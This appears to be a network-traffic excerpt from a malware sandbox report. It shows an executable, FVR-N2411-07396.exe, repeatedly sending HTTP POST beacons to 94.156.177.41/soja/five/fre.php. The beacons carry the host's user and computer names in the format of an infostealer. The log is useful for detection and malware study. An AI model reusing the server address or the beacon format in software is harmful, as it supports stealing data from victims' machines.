Nov 28, 2024 13:52:17.098931074 CET	242	OUT	POST /soja/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4FE624 Content-Length: 153 Connection: close
Nov 28, 2024 13:52:17.219155073 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 30 00 34 00 30 00 39 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons040965ALFONS-PC0FDD42EE188E931437F4FBE2C
Nov 28, 2024 13:52:18.734575987 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Thu, 28 Nov 2024 12:52:18 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.5	49721	94.156.177.41	80	1496	C:\Users\user\Desktop\FVR-N2411-07396.exe

Timestamp	Bytes transferred	Direction	Data
Nov 28, 2024 13:52:18.992889881 CET	242	OUT	POST /soja/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4FE624 Content-Length: 153 Connection: close
Nov 28, 2024 13:52:19.113785028 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 30 00 34 00 30 00 39 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons040965ALFONS-PC0FDD42EE188E931437F4FBE2C
Nov 28, 2024 13:52:20.432812929 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Thu, 28 Nov 2024 12:52:20 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.5	49724	94.156.177.41	80	1496	C:\Users\user\Desktop\FVR-N2411-07396.exe

Timestamp	Bytes transferred	Direction	Data
Nov 28, 2024 13:52:20.693635941 CET	242	OUT	POST /soja/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4FE624 Content-Length: 153 Connection: close
Nov 28, 2024 13:52:20.813749075 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 30 00 34 00 30 00 39 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons040965ALFONS-PC0FDD42EE188E931437F4FBE2C
Nov 28, 2024 13:52:22.279855967 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Thu, 28 Nov 2024 12:52:22 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.5	49726	94.156.177.41	80	1496	C:\Users\user\Desktop\FVR-N2411-07396.exe

Timestamp	Bytes transferred	Direction	Data
Nov 28, 2024 13:52:22.539007902 CET	242	OUT	POST /soja/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4FE624 Content-Length: 153 Connection: close
Nov 28, 2024 13:52:22.659041882 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 30 00 34 00 30 00 39 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons040965ALFONS-PC0FDD42EE188E931437F4FBE2C
Nov 28, 2024 13:52:24.172015905 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Thu, 28 Nov 2024 12:52:23 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.5	49727	94.156.177.41	80	1496	C:\Users\user\Desktop\FVR-N2411-07396.exe

Timestamp	Bytes transferred	Direction	Data
Nov 28, 2024 13:52:24.429666042 CET	242	OUT	POST /soja/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4FE624 Content-Length: 153 Connection: close
Nov 28, 2024 13:52:24.549788952 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 30 00 34 00 30 00 39 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons040965ALFONS-PC0FDD42EE188E931437F4FBE2C
Nov 28, 2024 13:52:25.971957922 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Thu, 28 Nov 2024 12:52:25 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.5	49733	94.156.177.41	80	1496	C:\Users\user\Desktop\FVR-N2411-07396.exe

Timestamp	Bytes transferred	Direction	Data
Nov 28, 2024 13:52:26.244560003 CET	242	OUT	POST /soja/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4FE624 Content-Length: 153 Connection: close
Nov 28, 2024 13:52:26.365633011 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 30 00 34 00 30 00 39 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons040965ALFONS-PC0FDD42EE188E931437F4FBE2C
Nov 28, 2024 13:52:27.874193907 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Thu, 28 Nov 2024 12:52:27 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.5	49739	94.156.177.41	80	1496	C:\Users\user\Desktop\FVR-N2411-07396.exe

Timestamp	Bytes transferred	Direction	Data
Nov 28, 2024 13:52:28.145422935 CET	242	OUT	POST /soja/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4FE624 Content-Length: 153 Connection: close
Nov 28, 2024 13:52:28.268944025 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 30 00 34 00 30 00 39 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons040965ALFONS-PC0FDD42EE188E931437F4FBE2C
Nov 28, 2024 13:52:29.593564987 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Thu, 28 Nov 2024 12:52:29 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.5	49745	94.156.177.41	80	1496	C:\Users\user\Desktop\FVR-N2411-07396.exe

Timestamp	Bytes transferred	Direction	Data
Nov 28, 2024 13:52:29.872065067 CET	242	OUT	POST /soja/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4FE624 Content-Length: 153 Connection: close
Nov 28, 2024 13:52:29.992183924 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 30 00 34 00 30 00 39 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons040965ALFONS-PC0FDD42EE188E931437F4FBE2C
Nov 28, 2024 13:52:31.306025028 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Thu, 28 Nov 2024 12:52:31 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.5	49750	94.156.177.41	80	1496	C:\Users\user\Desktop\FVR-N2411-07396.exe

Timestamp	Bytes transferred	Direction	Data
Nov 28, 2024 13:52:31.570786953 CET	242	OUT	POST /soja/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4FE624 Content-Length: 153 Connection: close
Nov 28, 2024 13:52:31.691657066 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 30 00 34 00 30 00 39 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons040965ALFONS-PC0FDD42EE188E931437F4FBE2C
Nov 28, 2024 13:52:33.012461901 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Thu, 28 Nov 2024 12:52:32 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.5	49751	94.156.177.41	80	1496	C:\Users\user\Desktop\FVR-N2411-07396.exe

Timestamp	Bytes transferred	Direction	Data
Nov 28, 2024 13:52:33.444705009 CET	242	OUT	POST /soja/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4FE624 Content-Length: 153 Connection: close
Nov 28, 2024 13:52:33.568486929 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 30 00 34 00 30 00 39 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons040965ALFONS-PC0FDD42EE188E931437F4FBE2C
Nov 28, 2024 13:52:35.031781912 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Thu, 28 Nov 2024 12:52:34 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.5	49757	94.156.177.41	80	1496	C:\Users\user\Desktop\FVR-N2411-07396.exe

Timestamp	Bytes transferred	Direction	Data
Nov 28, 2024 13:52:35.301023006 CET	242	OUT	POST /soja/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4FE624 Content-Length: 153 Connection: close
Nov 28, 2024 13:52:35.425400972 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 30 00 34 00 30 00 39 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons040965ALFONS-PC0FDD42EE188E931437F4FBE2C
Nov 28, 2024 13:52:36.795099020 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Thu, 28 Nov 2024 12:52:36 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.5	49762	94.156.177.41	80	1496	C:\Users\user\Desktop\FVR-N2411-07396.exe

Timestamp	Bytes transferred	Direction	Data
Nov 28, 2024 13:52:37.057039022 CET	242	OUT	POST /soja/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4FE624 Content-Length: 153 Connection: close
Nov 28, 2024 13:52:37.177766085 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 30 00 34 00 30 00 39 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons040965ALFONS-PC0FDD42EE188E931437F4FBE2C
Nov 28, 2024 13:52:38.452260017 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Thu, 28 Nov 2024 12:52:38 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.5	49768	94.156.177.41	80	1496	C:\Users\user\Desktop\FVR-N2411-07396.exe

Timestamp	Bytes transferred	Direction	Data
Nov 28, 2024 13:52:38.711698055 CET	242	OUT	POST /soja/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4FE624 Content-Length: 153 Connection: close
Nov 28, 2024 13:52:38.836045027 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 30 00 34 00 30 00 39 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons040965ALFONS-PC0FDD42EE188E931437F4FBE2C
Nov 28, 2024 13:52:40.153877020 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Thu, 28 Nov 2024 12:52:39 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.5	49771	94.156.177.41	80	1496	C:\Users\user\Desktop\FVR-N2411-07396.exe

Timestamp	Bytes transferred	Direction	Data
Nov 28, 2024 13:52:40.412333965 CET	242	OUT	POST /soja/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4FE624 Content-Length: 153 Connection: close
Nov 28, 2024 13:52:40.534388065 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 30 00 34 00 30 00 39 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons040965ALFONS-PC0FDD42EE188E931437F4FBE2C
Nov 28, 2024 13:52:41.957781076 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Thu, 28 Nov 2024 12:52:41 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.5	49775	94.156.177.41	80	1496	C:\Users\user\Desktop\FVR-N2411-07396.exe

Timestamp	Bytes transferred	Direction	Data
Nov 28, 2024 13:52:42.228101015 CET	242	OUT	POST /soja/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4FE624 Content-Length: 153 Connection: close
Nov 28, 2024 13:52:42.351772070 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 30 00 34 00 30 00 39 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons040965ALFONS-PC0FDD42EE188E931437F4FBE2C
Nov 28, 2024 13:52:43.776398897 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Thu, 28 Nov 2024 12:52:43 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.5	49781	94.156.177.41	80	1496	C:\Users\user\Desktop\FVR-N2411-07396.exe

Timestamp	Bytes transferred	Direction	Data
Nov 28, 2024 13:52:44.048556089 CET	242	OUT	POST /soja/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4FE624 Content-Length: 153 Connection: close
Nov 28, 2024 13:52:44.168555021 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 30 00 34 00 30 00 39 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons040965ALFONS-PC0FDD42EE188E931437F4FBE2C
Nov 28, 2024 13:52:45.678314924 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Thu, 28 Nov 2024 12:52:45 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.5	49785	94.156.177.41	80	1496	C:\Users\user\Desktop\FVR-N2411-07396.exe

Timestamp	Bytes transferred	Direction	Data
Nov 28, 2024 13:52:45.947307110 CET	242	OUT	POST /soja/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4FE624 Content-Length: 153 Connection: close
Nov 28, 2024 13:52:46.067495108 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 30 00 34 00 30 00 39 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons040965ALFONS-PC0FDD42EE188E931437F4FBE2C
Nov 28, 2024 13:52:47.491398096 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Thu, 28 Nov 2024 12:52:47 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.5	49791	94.156.177.41	80	1496	C:\Users\user\Desktop\FVR-N2411-07396.exe

Timestamp	Bytes transferred	Direction	Data
Nov 28, 2024 13:52:47.887581110 CET	242	OUT	POST /soja/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4FE624 Content-Length: 153 Connection: close
Nov 28, 2024 13:52:48.007586002 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 30 00 34 00 30 00 39 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons040965ALFONS-PC0FDD42EE188E931437F4FBE2C
Nov 28, 2024 13:52:49.519181013 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Thu, 28 Nov 2024 12:52:49 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.5	49797	94.156.177.41	80	1496	C:\Users\user\Desktop\FVR-N2411-07396.exe

Timestamp	Bytes transferred	Direction	Data
Nov 28, 2024 13:52:49.794187069 CET	242	OUT	POST /soja/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4FE624 Content-Length: 153 Connection: close
Nov 28, 2024 13:52:49.915880919 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 30 00 34 00 30 00 39 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons040965ALFONS-PC0FDD42EE188E931437F4FBE2C
Nov 28, 2024 13:52:51.273123980 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Thu, 28 Nov 2024 12:52:51 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.5	49801	94.156.177.41	80	1496	C:\Users\user\Desktop\FVR-N2411-07396.exe

Timestamp	Bytes transferred	Direction	Data
Nov 28, 2024 13:52:51.543040037 CET	242	OUT	POST /soja/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4FE624 Content-Length: 153 Connection: close
Nov 28, 2024 13:52:51.665644884 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 30 00 34 00 30 00 39 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons040965ALFONS-PC0FDD42EE188E931437F4FBE2C
Nov 28, 2024 13:52:53.173119068 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Thu, 28 Nov 2024 12:52:52 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.5	49806	94.156.177.41	80	1496	C:\Users\user\Desktop\FVR-N2411-07396.exe

Timestamp	Bytes transferred	Direction	Data
Nov 28, 2024 13:52:53.608174086 CET	242	OUT	POST /soja/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4FE624 Content-Length: 153 Connection: close
Nov 28, 2024 13:52:53.728328943 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 30 00 34 00 30 00 39 00 36 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons040965ALFONS-PC0FDD42EE188E931437F4FBE2C
Nov 28, 2024 13:52:55.119847059 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Thu, 28 Nov 2024 12:52:54 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.5	49811	94.156.177.41	80	1496	C:\Users\user\Desktop\FVR-N2411-07396.exe

Timestamp	Bytes transferred	Direction	Data
Nov 28, 2024 13:52:55.408077955 CET	242	OUT	POST /soja/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F4FE624 Content-Length: 153 Connection: close
